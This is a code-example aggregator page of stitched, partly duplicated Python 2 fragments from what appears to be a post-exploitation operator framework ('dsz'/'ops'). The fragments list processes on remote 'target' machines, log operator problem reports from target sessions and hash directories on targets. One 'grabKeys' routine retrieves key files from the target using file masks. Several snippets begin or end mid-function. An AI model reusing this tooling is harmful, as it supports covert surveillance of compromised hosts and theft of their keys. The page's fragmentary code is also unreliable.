Exemplo n.º 1
0
def pulist(ip, dszquiet=False):
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
    dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('performance', dszuser=ops.cmd.CURRENT_USER, data='Process', bare=True, target=(ip if (ip != '127.0.0.1') else None))
    ops.info(("Running '%s'..." % cmd))
    result = cmd.execute()
    if (not cmd.success):
        if (result.commandmetadata.status == 268435456):
            ops.error(('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid))
            del flags
            return None
        elif (result.commandmetadata.status is None):
            dszlogger = DSZPyLogger()
            log = dszlogger.getLogger(LOGFILE)
            log.error('Command did not execute, possibly the result of a malformed command line.')
            ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
        else:
            ops.error(('Failed to query performance hive. Check your logs for command ID %d for more information.' % result.cmdid))
            del flags
            return None
    if (not result.performance.object):
        ops.error(('Query succeeded but returned no data. Check your logs for command ID %d and hope for enlightenment.' % result.cmdid))
    regex = re.compile('.+\\....$')
    table = []
    echo = []
    uptime = None
    for instance in result.performance.object[0].instance:
        if (regex.match(instance.name) is None):
            proc = (instance.name + '.exe')
        else:
            proc = instance.name
        for c in instance.counter:
            if (c.name == '784'):
                pid = int(c.value)
            elif (c.name == '1410'):
                ppid = int(c.value)
            elif (c.name == '684'):
                runtime = datetime.timedelta(microseconds=((result.performance.perfTime100nSec - int(c.value)) // 10))
        if (((pid == 0) and (ppid == 0) and (instance.name == 'Idle')) or (((pid == 4) or (pid == 8)) and (instance.name == 'System'))):
            [code, comment] = [dsz.DEFAULT, ('System Idle Counter' if (instance.name == 'Idle') else 'System Kernel')]
        elif ((pid == 0) and (ppid == 0) and (instance.name == '_Total') and (runtime == datetime.timedelta(microseconds=0))):
            continue
        else:
            [code, comment] = check_process(proc)
        table.append({'Process': instance.name, 'PID': pid, 'PPID': ppid, 'Comment': comment, 'Elapsed Time': runtime})
        echo.append(code)
    pprint(table, dictorder=['PID', 'PPID', 'Elapsed Time', 'Process', 'Comment'], echocodes=echo)
    del flags
    return result
Exemplo n.º 2
0
def main():
    if (ops.TARGET_ADDR == 'z0.0.0.1'):
        ops.warn('Problems can only be reported from target sessions.  If you have no more target sessions, please complain about the problem through other means')
        sys.exit((-1))
    toolName = sys.argv[1]
    if (not dsz.env.Check('OPS_USERID')):
        idnum = dsz.ui.GetInt('Please enter your ID')
        dsz.env.Set('OPS_USERID', str(idnum), 0, '')
    idnum = dsz.env.Get('OPS_USERID')
    problemText = ' '.join(sys.argv[2:])
    dszLogger = DSZPyLogger()
    toolLog = dszLogger.getLogger(toolName)
    toolLog.log(21, ((idnum + ':') + problemText))
    ops.info('Your problem has been logged and will be reported when you are done')
Exemplo n.º 3
0
 def __init__(self, file, name):
     self.file = file
     self.name = name
     f = open(file, 'r')
     self.Priority = 10
     try:
         for line in f:
             line = line.strip()
             item = line.split(None, 1)
             self.__dict__[item[0]] = item[1]
     except:
         DSZPyLogger = DSZPyLogger()
         taskingLog = DSZPyLogger.getLogger('TaskingLog')
         taskingLog.warning(('Tasking.py failed to parse: %s' % file))
         shutil.copy(file, os.path.join(DSZPyLogger.LOG_FILE_DIR, '..'))
Exemplo n.º 4
0
def main():
    if (ops.TARGET_ADDR == 'z0.0.0.1'):
        ops.warn(
            'Problems can only be reported from target sessions.  If you have no more target sessions, please complain about the problem through other means'
        )
        sys.exit((-1))
    toolName = sys.argv[1]
    if (not dsz.env.Check('OPS_USERID')):
        idnum = dsz.ui.GetInt('Please enter your ID')
        dsz.env.Set('OPS_USERID', str(idnum), 0, '')
    idnum = dsz.env.Get('OPS_USERID')
    problemText = ' '.join(sys.argv[2:])
    dszLogger = DSZPyLogger()
    toolLog = dszLogger.getLogger(toolName)
    toolLog.log(21, ((idnum + ':') + problemText))
    ops.info(
        'Your problem has been logged and will be reported when you are done')
Exemplo n.º 5
0
def emkg_plist(ip, dszquiet=False):
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
    dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('processes', dszuser=ops.cmd.CURRENT_USER, list=True, target=(ip if (ip != '127.0.0.1') else None))
    ops.info(("Running '%s'..." % cmd))
    result = cmd.execute()
    if (not cmd.success):
        if (result.commandmetadata.status == 268435456):
            ops.error(('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid))
            del flags
            return None
        elif (result.commandmetadata.status is None):
            dszlogger = DSZPyLogger()
            log = dszlogger.getLogger(LOGFILE)
            log.error('Command did not execute, possibly the result of a malformed command line.')
            ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
        else:
            ops.error(('Failed to query performance hive. Check your logs for command ID %d for more information.' % result.cmdid))
            del flags
            return None
    table = []
    echo = []
    for processitem in result.initialprocesslistitem.processitem:
        if ((processitem.id == 0) and (processitem.parentid == 0)):
            name = 'System Idle Process'
        else:
            name = processitem.name
        [code, comment] = check_process(name)
        table.append({'Path': processitem.path, 'Process': name, 'PID': processitem.id, 'PPID': processitem.parentid, 'Created': ('' if ((processitem.name == 'System') or (processitem.name == 'System Idle Process')) else ('%s %s %s' % (processitem.created.date, processitem.created.time, processitem.created.type.upper()))), 'Comment': comment, 'User': processitem.user})
        echo.append(code)
    if ((ip is None) or (ip == '127.0.0.1')):
        pprint(table, dictorder=['PID', 'PPID', 'Created', 'Path', 'Process', 'User', 'Comment'], echocodes=echo)
    else:
        pprint(table, dictorder=['PID', 'PPID', 'Created', 'Path', 'Process', 'Comment'], echocodes=echo)
    del flags
    return result
Exemplo n.º 6
0
 if args:
     parser.print_help()
     parser.error('Not all arguments consumed by the beast.')
 if (not (options.wmi ^ options.reg)):
     parser.print_help()
     parser.error('One of --wmi or --reg must be specified so I know what to do.')
 if (options.target is None):
     if (not dsz.ui.Prompt('No target provided. Did you really mean to run this against localhost?', False)):
         sys.exit((-1))
 if ((options.target is not None) and options.target.startswith('\\\\')):
     options.target = options.target[2:]
     ops.info(("A \\\\ is not required. I assume you mean '%s' as your target IP." % options.target))
 if ((options.target is not None) and (not util.ip.validate(options.target))):
     ops.error(("Your target '%s' does not appear to be a proper IP address. Try again." % options.target))
     sys.exit((-1))
 if options.wmi:
     func = emkg_plist
 elif options.reg:
     func = pulist
 else:
     raise RuntimeError, "How'd you get here? You get a prize!"
 try:
     ret = func(options.target, dszquiet)
 except Exception as e:
     dszlogger = DSZPyLogger()
     log = dszlogger.getLogger(LOGFILE)
     log.error(traceback.format_exc())
     ops.info('Unexpected things happened. A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
     ret = False
 if (not ret):
     sys.exit((-1))
Exemplo n.º 7
0
    for fullpath in getlist:
        command = ('get "%s"' % fullpath)
        dsz.cmd.Run(command, dsz.RUN_FLAG_RECORD)

def main():
    last_run = ops.marker.get('GRABKEYS')['last_date']
    if ((datetime.datetime.now() - last_run) <= RUN_PERIOD):
        ops.info(('grabKeys was run in the last %s, not running again' % str(RUN_PERIOD)))
        return
    answer = dsz.ui.Prompt(('Do you want to run grabKeys?  Last run was %s' % last_run))
    if (not answer):
        return
    masks = getMaskList()
    for mask in masks:
        try:
            getKeys(mask, last_run)
        except:
            ops.error(('Failed to get keys with mask "%s"' % mask))
            traceback.print_exc()
    ops.info('All masks completed or at least attempted, marking grabKeys done')
    ops.marker.set('GRABKEYS')
if (__name__ == '__main__'):
    try:
        main()
    except:
        ops.error('Grabkeys had a major failure')
        traceback.print_exc()
        problemText = str(sys.exc_info())
        dszLogger = DSZPyLogger()
        toolLog = dszLogger.getLogger('grabkeys')
        toolLog.log(10, problemText)
Exemplo n.º 8
0
def pulist(ip, dszquiet=False):
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
    dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('performance',
                                dszuser=ops.cmd.CURRENT_USER,
                                data='Process',
                                bare=True,
                                target=(ip if (ip != '127.0.0.1') else None))
    ops.info(("Running '%s'..." % cmd))
    result = cmd.execute()
    if (not cmd.success):
        if (result.commandmetadata.status == 268435456):
            ops.error((
                'Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.'
                % result.cmdid))
            del flags
            return None
        elif (result.commandmetadata.status is None):
            dszlogger = DSZPyLogger()
            log = dszlogger.getLogger(LOGFILE)
            log.error(
                'Command did not execute, possibly the result of a malformed command line.'
            )
            ops.info(
                'A problem report has been automatically generated for this issue.',
                type=dsz.DEFAULT)
        else:
            ops.error((
                'Failed to query performance hive. Check your logs for command ID %d for more information.'
                % result.cmdid))
            del flags
            return None
    if (not result.performance.object):
        ops.error((
            'Query succeeded but returned no data. Check your logs for command ID %d and hope for enlightenment.'
            % result.cmdid))
    regex = re.compile('.+\\....$')
    table = []
    echo = []
    uptime = None
    for instance in result.performance.object[0].instance:
        if (regex.match(instance.name) is None):
            proc = (instance.name + '.exe')
        else:
            proc = instance.name
        for c in instance.counter:
            if (c.name == '784'):
                pid = int(c.value)
            elif (c.name == '1410'):
                ppid = int(c.value)
            elif (c.name == '684'):
                runtime = datetime.timedelta(microseconds=(
                    (result.performance.perfTime100nSec - int(c.value)) // 10))
        if (((pid == 0) and (ppid == 0) and (instance.name == 'Idle')) or
            (((pid == 4) or (pid == 8)) and (instance.name == 'System'))):
            [code, comment] = [
                dsz.DEFAULT,
                ('System Idle Counter' if
                 (instance.name == 'Idle') else 'System Kernel')
            ]
        elif ((pid == 0) and (ppid == 0) and (instance.name == '_Total')
              and (runtime == datetime.timedelta(microseconds=0))):
            continue
        else:
            [code, comment] = check_process(proc)
        table.append({
            'Process': instance.name,
            'PID': pid,
            'PPID': ppid,
            'Comment': comment,
            'Elapsed Time': runtime
        })
        echo.append(code)
    pprint(table,
           dictorder=['PID', 'PPID', 'Elapsed Time', 'Process', 'Comment'],
           echocodes=echo)
    del flags
    return result
Exemplo n.º 9
0
def emkg_plist(ip, dszquiet=False):
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
    dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('processes',
                                dszuser=ops.cmd.CURRENT_USER,
                                list=True,
                                target=(ip if (ip != '127.0.0.1') else None))
    ops.info(("Running '%s'..." % cmd))
    result = cmd.execute()
    if (not cmd.success):
        if (result.commandmetadata.status == 268435456):
            ops.error((
                'Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.'
                % result.cmdid))
            del flags
            return None
        elif (result.commandmetadata.status is None):
            dszlogger = DSZPyLogger()
            log = dszlogger.getLogger(LOGFILE)
            log.error(
                'Command did not execute, possibly the result of a malformed command line.'
            )
            ops.info(
                'A problem report has been automatically generated for this issue.',
                type=dsz.DEFAULT)
        else:
            ops.error((
                'Failed to query performance hive. Check your logs for command ID %d for more information.'
                % result.cmdid))
            del flags
            return None
    table = []
    echo = []
    for processitem in result.initialprocesslistitem.processitem:
        if ((processitem.id == 0) and (processitem.parentid == 0)):
            name = 'System Idle Process'
        else:
            name = processitem.name
        [code, comment] = check_process(name)
        table.append({
            'Path':
            processitem.path,
            'Process':
            name,
            'PID':
            processitem.id,
            'PPID':
            processitem.parentid,
            'Created':
            ('' if ((processitem.name == 'System') or
                    (processitem.name == 'System Idle Process')) else
             ('%s %s %s' % (processitem.created.date, processitem.created.time,
                            processitem.created.type.upper()))),
            'Comment':
            comment,
            'User':
            processitem.user
        })
        echo.append(code)
    if ((ip is None) or (ip == '127.0.0.1')):
        pprint(table,
               dictorder=[
                   'PID', 'PPID', 'Created', 'Path', 'Process', 'User',
                   'Comment'
               ],
               echocodes=echo)
    else:
        pprint(
            table,
            dictorder=['PID', 'PPID', 'Created', 'Path', 'Process', 'Comment'],
            echocodes=echo)
    del flags
    return result
Exemplo n.º 10
0
             False)):
         sys.exit((-1))
 if ((options.target is not None) and options.target.startswith('\\\\')):
     options.target = options.target[2:]
     ops.info((
         "A \\\\ is not required. I assume you mean '%s' as your target IP."
         % options.target))
 if ((options.target is not None)
         and (not util.ip.validate(options.target))):
     ops.error((
         "Your target '%s' does not appear to be a proper IP address. Try again."
         % options.target))
     sys.exit((-1))
 if options.wmi:
     func = emkg_plist
 elif options.reg:
     func = pulist
 else:
     raise RuntimeError, "How'd you get here? You get a prize!"
 try:
     ret = func(options.target, dszquiet)
 except Exception as e:
     dszlogger = DSZPyLogger()
     log = dszlogger.getLogger(LOGFILE)
     log.error(traceback.format_exc())
     ops.info(
         'Unexpected things happened. A problem report has been automatically generated for this issue.',
         type=dsz.DEFAULT)
     ret = False
 if (not ret):
     sys.exit((-1))
Exemplo n.º 11
0
import ops.cmd, ops.db, ops
import os.path
import dsz
from ops.pprint import pprint
import sys
from util.DSZPyLogger import DSZPyLogger
from datetime import timedelta
import optparse
dzlogger = DSZPyLogger()
drvlog = dzlogger.getLogger('DRIVERLIST')


def main(argv=None):
    parser = optparse.OptionParser()
    parser.add_option('-a',
                      dest='maxage',
                      action='store',
                      type='int',
                      default=3600,
                      help='The maximum age for any particular dir')
    options = parser.parse_args(argv)[0]
    maxage = options.maxage
    voldb = ops.db.get_voldb()
    conn = voldb.connection
    with conn:
        curs = conn.execute('SELECT mask,path FROM hashhunter WHERE cpaddr=?',
                            [ops.TARGET_ADDR])
    dir_list = []
    for row in curs:
        dir_list.append([row['mask'], row['path']])
    completed = []
Exemplo n.º 12
0
import ops.cmd, ops.db, ops
import os.path
import dsz
from ops.pprint import pprint
import sys
from util.DSZPyLogger import DSZPyLogger
from datetime import timedelta
import optparse
dzlogger = DSZPyLogger()
drvlog = dzlogger.getLogger('DRIVERLIST')

def main(argv=None):
    parser = optparse.OptionParser()
    parser.add_option('-a', dest='maxage', action='store', type='int', default=3600, help='The maximum age for any particular dir')
    options = parser.parse_args(argv)[0]
    maxage = options.maxage
    voldb = ops.db.get_voldb()
    conn = voldb.connection
    with conn:
        curs = conn.execute('SELECT mask,path FROM hashhunter WHERE cpaddr=?', [ops.TARGET_ADDR])
    dir_list = []
    for row in curs:
        dir_list.append([row['mask'], row['path']])
    completed = []
    for item in dir_list:
        if (item in completed):
            continue
        dircmd = ops.cmd.getDszCommand('dir -hash sha1 -max 0')
        dircmd.mask = item[0]
        dircmd.path = item[1]